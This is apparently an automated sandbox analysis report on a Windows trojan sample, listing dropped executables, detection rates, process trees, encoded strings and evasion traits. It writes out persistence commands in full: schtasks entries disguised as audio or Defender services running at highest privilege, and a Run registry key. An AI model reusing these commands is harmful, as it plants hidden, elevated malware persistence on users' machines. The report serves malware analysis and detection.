Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe

Source: CVbJSUXraQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\btpanui

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E1A06A GetLastError,FormatMessageW,

1_2_00E1A06A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00DB4E89

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\CVbJSUXraQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\AppData\Local\Temp\vnc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

1_2_00E13C55

Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CVbJSUXraQ.exe

Static file information: File size 2111264 > 1048576

Source: CVbJSUXraQ.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800

Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CVbJSUXraQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD8945 push ecx; ret	1_2_00DD8958
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB103B push ecx; ret	4_2_00AB104B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ABE0BC push ecx; ret	4_2_00ABE0CC
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEAA9 push cs; iretd	4_2_00ADEAB8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEA73 push cs; ret	4_2_00ADEA88
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE3DD push es; iretd	4_2_00ADE3EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA2D0C push ecx; ret	5_2_00CA2D1C
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F125B2 push esi; ret	6_2_00F125CF
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD8945 push ecx; ret	7_2_00DD8958
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC4257 push edi; ret	7_2_00DC4259
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC426B push edi; ret	7_2_00DC426D
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A068 push 0041A08Eh; ret	7_2_0041A086
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A02C push 0041A05Ch; ret	7_2_0041A054
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E8D0 push 0040E905h; ret	7_2_0040E8FD
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B164 push 0040B190h; ret	7_2_0040B188
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E908 push 0040E94Ah; ret	7_2_0040E942
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B12C push 0040B158h; ret	7_2_0040B150
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C136 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C138 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040813C push 00408174h; ret	7_2_0040816C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004171E8 push 00417214h; ret	7_2_0041720C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EA push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EC push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E1A4 push 0040E1D0h; ret	7_2_0040E1C8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B1B8 push 0040B1E4h; ret	7_2_0040B1DC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25A push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25C push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00414A28 push 00414A84h; ret	7_2_00414A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040BAB8 push 0040BAE4h; ret	7_2_0040BADC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B54 push 00409BC8h; ret	7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B78 push 00409BC8h; ret	7_2_00409BC0

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

1_2_00DB4B37

Source: windef.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe	Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x657b3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Uses known network protocols on non-standard ports

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00DB48D7
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,	5_2_00C83CC0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,	5_2_00C8143C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C821C8 IsIconic,	5_2_00C821C8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,	5_2_00C7CDE8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,	5_2_00C7B764
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	7_2_00DB48D7
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00A448D7

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00DD3187

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
